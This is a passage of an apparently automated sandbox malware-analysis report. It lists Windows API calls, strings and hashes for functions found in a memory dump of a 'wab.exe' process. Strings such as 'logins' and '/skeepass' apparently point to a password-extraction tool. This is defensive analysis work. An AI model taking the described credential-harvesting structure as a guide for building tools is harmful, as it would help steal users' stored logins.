                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                          • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                          • API String ID: 3330709923-517860148
                                                                                                                                                                                          • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                          • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                            • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                          • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                          • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                          • _wtoi.MSVCRT ref: 004081AF
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                          • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                            • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                                                            • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                          • String ID: logins$null
                                                                                                                                                                                          • API String ID: 3492182834-2163367763
                                                                                                                                                                                          • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                          • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                          • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                          • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                          • memset.MSVCRT ref: 00408606
                                                                                                                                                                                          • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004086DB
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004086FA
                                                                                                                                                                                          • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                          • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                          • String ID: ---
                                                                                                                                                                                          • API String ID: 3437578500-2854292027
                                                                                                                                                                                          • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                          • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                          • memset.MSVCRT ref: 00410892
                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1010922700-0
                                                                                                                                                                                          • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                          • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                                                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                          • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@$FullNamePath$malloc$Version
                                                                                                                                                                                          • String ID: |A
                                                                                                                                                                                          • API String ID: 4233704886-1717621600
                                                                                                                                                                                          • Opcode ID: c2466c63737be692c3a7dfafc6e02f378046f46b324897726c23362a1a564614
                                                                                                                                                                                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                          • Opcode Fuzzy Hash: c2466c63737be692c3a7dfafc6e02f378046f46b324897726c23362a1a564614
                                                                                                                                                                                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                          • API String ID: 2081463915-1959339147
                                                                                                                                                                                          • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                          • API String ID: 2012295524-70141382
                                                                                                                                                                                          • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                                                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                          • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                          • API String ID: 667068680-3953557276
                                                                                                                                                                                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0041234D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1700100422-0
                                                                                                                                                                                          • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                          • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 552707033-0
                                                                                                                                                                                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040C11B
                                                                                                                                                                                          • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                          • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                          • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                          • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                          • String ID: 4$h
                                                                                                                                                                                          • API String ID: 4066021378-1856150674
                                                                                                                                                                                          • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                          • String ID: %%0.%df
                                                                                                                                                                                          • API String ID: 3473751417-763548558
                                                                                                                                                                                          • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                          • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0040610B
